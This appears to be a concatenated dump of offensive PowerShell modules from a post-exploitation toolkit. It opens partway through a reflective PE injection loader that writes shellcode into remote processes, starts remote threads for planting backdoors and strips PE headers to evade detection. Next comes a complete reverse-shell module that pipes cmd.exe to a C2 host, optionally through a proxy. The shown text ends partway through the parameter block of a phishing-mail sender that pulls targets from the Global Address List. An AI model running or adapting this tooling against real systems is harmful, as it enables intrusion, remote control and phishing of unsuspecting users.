$Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE if ((-not $ForceASLR) -and (-not $PESupportsASLR)) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue [IntPtr]$LoadAddr = $OriginalImageBase } elseif ($ForceASLR -and (-not $PESupportsASLR)) { Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash." } if ($ForceASLR -and $RemoteLoading) { Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop } if ($RemoteLoading -and (-not $PESupportsASLR)) { Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop } $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process. if ($RemoteLoading -eq $true) { #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) #todo, error handling needs to delete this memory if an error happens along the way $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($EffectivePEHandle -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use" } } else { if ($NXCompatible -eq $true) { $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) } else { $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) } $EffectivePEHandle = $PEHandle } [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage) if ($PEHandle -eq [IntPtr]::Zero) { Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)." } [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null #Now that the PE is in memory, get more detailed information about it Write-Verbose "Getting detailed PE information from the headers loaded in memory" $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle Write-Verbose "StartAddress: $(Get-Hex $PEHandle) EndAddress: $(Get-Hex $PEEndAddress)" #Copy each section from the PE in to memory Write-Verbose "Copy PE sections in to memory" Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory" Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types #The PE we are in-memory loading has DLLs it needs, import those DLLs for it Write-Verbose "Import DLL's needed by the PE we are loading" if ($RemoteLoading -eq $true) { Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle } else { Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants } #Update the memory protection flags for all the memory just allocated if ($RemoteLoading -eq $false) { if ($NXCompatible -eq $true) { Write-Verbose "Update memory protection flags" Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types } else { Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute" } } else { Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions" } #If remote loading, copy the DLL in to remote process memory if ($RemoteLoading -eq $true) { [UInt32]$NumBytesWritten = 0 $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten) if ($Success -eq $false) { Throw "Unable to write shellcode to remote process memory." } } #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function if ($PEInfo.FileType -ieq "DLL") { if ($RemoteLoading -eq $false) { Write-Verbose "Calling dllmain so the DLL knows it has been loaded" $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null } else { $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) if ($PEInfo.PE64Bit -eq $true) { #Shellcode: CallDllMain.asm $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9) $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8) $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3) } else { #Shellcode: CallDllMain.asm $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9) $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8) $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3) } $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2) $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) $SCPSMemOriginal = $SCPSMem Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length) $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($RSCAddr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for shellcode" } $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) { Throw "Unable to write shellcode to remote process memory." } $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null } } elseif ($PEInfo.FileType -ieq "EXE") { #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1) [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00) $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread # This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread. [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in." $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null while($true) { [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0) if ($ThreadDone -eq 1) { Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants Write-Verbose "EXE thread has completed." break } else { Start-Sleep -Seconds 1 } } } return @($PEInfo.PEHandle, $EffectivePEHandle) } Function Invoke-MemoryFreeLibrary { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $PEHandle ) #Get Win32 constants and functions $Win32Constants = Get-Win32Constants $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants #Call FreeLibrary for all the imports of the DLL if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) { [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) while ($true) { $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) #If the structure is null, it signals that this is the end of the array if ($ImportDescriptor.Characteristics -eq 0 ` -and $ImportDescriptor.FirstThunk -eq 0 ` -and $ImportDescriptor.ForwarderChain -eq 0 ` -and $ImportDescriptor.Name -eq 0 ` -and $ImportDescriptor.TimeDateStamp -eq 0) { Write-Verbose "Done unloading the libraries needed by the PE" break } $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))) $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath) if ($ImportDllHandle -eq $null) { Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue } $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle) if ($Success -eq $false) { Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue } $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) } } #Call DllMain with process detach Write-Verbose "Calling dllmain so the DLL knows it is being unloaded" $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Function Main { $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $Win32Constants = Get-Win32Constants $RemoteProcHandle = [IntPtr]::Zero #If a remote process to inject in to is specified, get a handle to it if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne "")) { Throw "Can't supply a ProcId and ProcName, choose one or the other" } elseif ($ProcName -ne $null -and $ProcName -ne "") { $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) if ($Processes.Count -eq 0) { Throw "Can't find process $ProcName" } elseif ($Processes.Count -gt 1) { $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId Write-Output $ProcInfo Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." } else { $ProcId = $Processes[0].ID } } #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege # if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) # { # Write-Verbose "Getting SeDebugPrivilege" # Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants # } if (($ProcId -ne $null) -and ($ProcId -ne 0)) { $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) if ($RemoteProcHandle -eq [IntPtr]::Zero) { Throw "Couldn't obtain the handle for process ID: $ProcId" } Write-Verbose "Got the handle for the remote process to inject in to" } #Load the PE reflectively Write-Verbose "Calling Invoke-MemoryLoadLibrary" $PEHandle = [IntPtr]::Zero if ($RemoteProcHandle -eq [IntPtr]::Zero) { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR } else { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR } if ($PELoadedInfo -eq [IntPtr]::Zero) { Throw "Unable to load PE, handle returned is NULL" } $PEHandle = $PELoadedInfo[0] $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) { ######################################### ### YOUR CODE GOES HERE ######################################### switch ($FuncReturnType) { 'WString' { Write-Verbose "Calling function with WString return type" [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc" if ($WStringFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $WStringFuncDelegate = Get-DelegateType @() ([IntPtr]) $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) [IntPtr]$OutputPtr = $WStringFunc.Invoke() $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) Write-Output $Output } 'String' { Write-Verbose "Calling function with String return type" [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc" if ($StringFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $StringFuncDelegate = Get-DelegateType @() ([IntPtr]) $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate) [IntPtr]$OutputPtr = $StringFunc.Invoke() $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr) Write-Output $Output } 'Void' { Write-Verbose "Calling function with Void return type" [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" if ($VoidFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $VoidFuncDelegate = Get-DelegateType @() ([Void]) $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate) $VoidFunc.Invoke() | Out-Null } } ######################################### ### END OF YOUR CODE ######################################### } #For remote DLL injection, call a void function which takes no parameters elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) { Throw "VoidFunc couldn't be found in the DLL" } $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions } #Don't free a library if it is injected in a remote process or if it is an EXE. #Note that all DLL's loaded by the EXE will remain loaded in memory. if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL") { Invoke-MemoryFreeLibrary -PEHandle $PEHandle } else { #Delete the PE file from memory. $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Write-Verbose "Done!" } Main } #Main function to either run the script locally or remotely Function Main { if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent) { $DebugPreference = "Continue" } Write-Verbose "PowerShell ProcessID: $PID" if ($PsCmdlet.ParameterSetName -ieq "LocalFile") { Get-ChildItem $PEPath -ErrorAction Stop | Out-Null [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) } elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") { $WebClient = New-Object System.Net.WebClient [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) } else{ [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEbase64) } #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' if ($e_magic -ne 'MZ') { throw 'PE is not a valid PE file.' } # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. $PEBytes[0] = 0 $PEBytes[1] = 0 #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1) if ($ExeArgs -ne $null -and $ExeArgs -ne '') { $ExeArgs = "ReflectiveExe $ExeArgs" } else { $ExeArgs = "ReflectiveExe" } if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") { Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) } else { Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName } } Main } ================================================ FILE: modules/Invoke-SendReverseShell.ps1 ================================================ function Invoke-SendReverseShell { <# .SYNOPSIS Sends a reverse shell (cmd.exe) to a remote host. The remote host simply has to listen on a TCP socket, for example: - With netcat: # nc -l -p - With socat: # socat TCP-L:,fork,reuseaddr - The connection can be established directly to the remote host, OR through a web proxy. If a web proxy is to be used, it can either be manually specified or the system's default proxy can be used. Function: Invoke-SendReverseShell Author: Arno0x0x, Twitter: @Arno0x0x .EXAMPLE # Direct connection: PS C:\> Invoke-SendReverseShell -DestHost c2server.foobar.com -DestPort 5555 # Connection through system's default proxy PS C:\> Invoke-SendReverseShell -DestHost c2server.foobar.com -DestPort 5555 -UseDefaultProxy # Connection through manually specified proxy PS C:\> Invoke-SendReverseShell -DestHost c2server.foobar.com -DestPort 5555 -ProxyName proxy.name.local|proxyIp -ProxyPort 3128 #> [CmdletBinding(DefaultParameterSetName="main")] Param ( [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [String]$DestHost = $( Read-Host "Enter destination IP or Hostname: " ), [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int]$DestPort = $( Read-Host "Enter destination port: " ), [Parameter(Mandatory = $False)] [Int]$TimeOut = 60, [Parameter(Mandatory = $False, ParameterSetName="AutoProxy")] [Switch]$UseDefaultProxy, [Parameter(Mandatory = $False, ParameterSetName="ManualProxy")] [String]$ProxyName, [Parameter(Mandatory = $False, ParameterSetName="ManualProxy")] [Int]$ProxyPort = 8080 ) #------------------------------------------------------------------------------- # Connecting to Destination Host through a proxy ? if ($UseDefaultProxy -or $ProxyName) { $DestUri = "http://" + $DestHost + ":" + $DestPort $UseProxy = $True } if ($ProxyName) { $Proxy = New-Object System.Net.WebProxy("http://" + $ProxyName + ":" + $ProxyPort) Write-Verbose "Using proxy [$ProxyName`:$ProxyPort]" } elseif ($UseDefaultProxy) { # Detect and set automatic proxy and network credentials $Proxy = [System.Net.WebRequest]::DefaultWebProxy $Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $ProxyName = $Proxy.GetProxy($DestUri).Host $ProxyPort = $Proxy.GetProxy($DestUri).Port if ($ProxyName -eq $DestHost) { $UseProxy = $False Write-Verbose "System's default proxy is not set, not using it" } else { Write-Verbose "Using system's default proxy [$ProxyName`:$ProxyPort]" } } if ($UseProxy) { $DestHostWebRequest = [System.Net.HttpWebRequest]::Create("http://" + $DestHost + ":" + $DestPort) $DestHostWebRequest.Method = "CONNECT" $DestHostWebRequest.Proxy = $Proxy $ConnectionTask = $DestHostWebRequest.GetResponseAsync() Write-Verbose "[DEBUG] Connecting to [$DestHost`:$DestPort] through proxy [$ProxyName`:$ProxyPort]" } else { $DestHostSocket = New-Object System.Net.Sockets.TcpClient $ConnectionTask = $DestHostSocket.ConnectAsync($DestHost,$DestPort) Write-Verbose "[DEBUG] Connecting to [$DestHost`:$DestPort]" } # Wait maximum connection timeout $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while ($True) { # Capture keyboard interrupt from user if ($Host.UI.RawUI.KeyAvailable) { if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode)) { Write-Verbose "[DEBUG] Interrupting connection setup" if ($UseProxy) { $DestHostWebRequest.Abort() } else { $DestHostSocket.Close() } $Stopwatch.Stop() return } } # Check connection timeout if ($Stopwatch.Elapsed.TotalSeconds -gt $Timeout) { Write-Verbose "[ERROR] Connection timeout reached" if ($UseProxy) { $DestHostWebRequest.Abort() } else { $DestHostSocket.Close() } $Stopwatch.Stop() return } # Check TCP connection is completed if ($ConnectionTask.IsCompleted) { try { if ($UseProxy) { $ResponseStream = ([System.Net.HttpWebResponse]$ConnectionTask.Result).GetResponseStream() # Reflective inspection to retrieve and reuse the underlying NetworkStream instance $BindingFlags= [Reflection.BindingFlags] "NonPublic,Instance" $rsType = $ResponseStream.GetType() $connectionProperty = $rsType.GetProperty("Connection", $BindingFlags) $connection = $connectionProperty.GetValue($ResponseStream, $null) $connectionType = $connection.GetType() $networkStreamProperty = $connectionType.GetProperty("NetworkStream", $BindingFlags) $DestHostStream = $networkStreamProperty.GetValue($connection, $null) $BufferSize = 65536 Write-Verbose ("[DEBUG] Connection to [$DestHost`:$DestPort] through proxy [$ProxyName`:$ProxyPort] succeeded") } else { $DestHostStream = $DestHostSocket.GetStream() $BufferSize = $DestHostSocket.ReceiveBufferSize Write-Verbose ("[DEBUG] Connection to [$DestHost`:$DestPort] succeeded") } } catch { Write-Verbose($_.Exception.Message) if ($UseProxy) { $DestHostWebRequest.Abort() } else { $DestHostSocket.Close() } $Stopwatch.Stop() Write-Verbose ("[ERROR] Connection to [$DestHost`:$DestPort] could NOT be established") return } break } } $Stopwatch.Stop() $Global:Loop = $True #------------------------------------------------------------------------------ $DestHostBuffer = New-Object System.Byte[] $BufferSize $DestHostReadTask = $DestHostStream.ReadAsync($DestHostBuffer, 0, $BufferSize) $AsciiEncoding = New-Object System.Text.AsciiEncoding #------------------------------------------------------------------------------ # Starting shell process $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo $ProcessStartInfo.FileName = "cmd.exe" $ProcessStartInfo.Arguments = "/q" $ProcessStartInfo.UseShellExecute = $False $ProcessStartInfo.RedirectStandardInput = $True $ProcessStartInfo.RedirectStandardOutput = $True $ProcessStartInfo.RedirectStandardError = $True $ProcessStartInfo.CreateNoWindow = $True $Process = [System.Diagnostics.Process]::Start($ProcessStartInfo) $Process.EnableRaisingEvents = $True Register-ObjectEvent -InputObject $Process -EventName "Exited" -Action { $Global:Loop = $False } | Out-Null $Process.Start() | Out-Null # Create buffers for storing data from process StdOut and StdErr $StdOutBuffer = New-Object System.Byte[] 65536 $StdErrBuffer = New-Object System.Byte[] 65536 # Start Asynchronous read of data from both StdOut and StdErr $StdOutReadTask = $Process.StandardOutput.BaseStream.ReadAsync($StdOutBuffer, 0, 65536) $StdErrReadTask= $Process.StandardError.BaseStream.ReadAsync($StdErrBuffer, 0, 65536) #----------------------------------------------------------------------------------------------------- # Now that both streams are connected, cross read and write data from both streams try { while($Global:Loop) { try { #---------------------------------------------------------------- # Read data from Process Stream and send it to DestHost Stream [byte[]]$Data = @() # Read data from StdOut, if any available if($StdOutReadTask.IsCompleted) { if ([int]$StdOutReadTask.Result -ne 0) { $Data += $StdOutBuffer[0..([int]$StdOutReadTask.Result - 1)] $StdOutReadTask = $Process.StandardOutput.BaseStream.ReadAsync($StdOutBuffer, 0, 65536) } } # Read data from StdErr, if any available if($StdErrReadTask.IsCompleted) { if([int]$StdErrReadTask.Result -ne 0) { $Data += $StdErrBuffer[0..([int]$StdErrReadTask.Result - 1)] $StdErrReadTask= $Process.StandardError.BaseStream.ReadAsync($StdErrBuffer, 0, 65536) } } # Now if there's data available, send it to the Destination Host if ($Data -ne $null) { $DestHostStream.Write($Data, 0, $Data.Length) } } catch { Write-Verbose "[ERROR] Failed to redirect data from Process StdOut/StdErr to Destination Host" break } #---------------------------------------------------------------- # Read data from DestHost Stream and send it to Process StdIn Stream try { $Data = $null if($DestHostReadTask.IsCompleted) { if([int]$DestHostReadTask.Result -ne 0) { $Data = $DestHostBuffer[0..([int][int]$DestHostReadTask.Result - 1)] $DestHostReadTask = $DestHostStream.ReadAsync($DestHostBuffer, 0, $BufferSize) } } if ($Data -ne $null) { $Process.StandardInput.WriteLine($AsciiEncoding.GetString($Data).TrimEnd("`r").TrimEnd("`n")) } } catch { Write-Verbose "[ERROR] Failed to redirect data from Destination Host to Process StdIn" break } } #EndWhile } #EndTry finally { Write-Verbose "[DEBUG] Closing..." try { $Process | Stop-Process } catch { Write-Verbose "[ERROR] Failed to stop child process" } try { $DestHostStream.Close() if ($UseProxy) { $DestHostWebRequest.Abort() } else { $DestHostSocket.Close() } } catch { Write-Verbose "[ERROR] Failed to close socket to destination host" } } } ================================================ FILE: modules/MailRaider.ps1 ================================================ #requires -version 2 <# MailRaider v0.1 by @xorrior #> function Invoke-SendMail { <# .SYNOPSIS This function sends emails using a custom or default template to specified target email addresses. .DESCRIPTION This function sends a specified number of phishing emails to a specific email address or a target list. A payload or URL can be included in the email. The E-Mail will be constructed based on a template or by specifying the Subject and Body of the email. .PARAMETER Targets Array of target email addresses. If Targets or TargetList parameter are not specified, a list of 100 email addresses will be randomly selected from the Global Address List. .PARAMETER TargetList List of email addresses read from a file. If Targets or TargetList parameter are not specified, a list of 100 email addresses will be randomly selected from the Global Address List. .PARAMETER URL URL to include in the email .PARAMETER Attachment Full path to the file to use as a payload .PARAMETER Template Full path to the template html file .PARAMETER Subject Subject of the email .PARAMETER Body Body of the email .EXAMPLE Invoke-SendMail -Targets $Emails -URL "http://bigorg.com/projections.xls" -Subject "Hi" -Body "Please check this link out!" Send phishing email to the array of target email addresses with an embedded url. .EXAMPLE Invoke-SendMail -TargetList .\Targets.txt -Attachment .\Notice.rtf -Template .\Phish.html Send phishing email to the list of addresses from file and include the specified attachment. #> [CmdletBinding()] param( [Parameter(Mandatory = $False, Position = 0, ValueFromPipeline = $True)] [string[]]$Targets, [Parameter(Mandatory = $False, Position = 1)] [string]$TargetList, [Parameter(Mandatory = $False, Position = 2)] 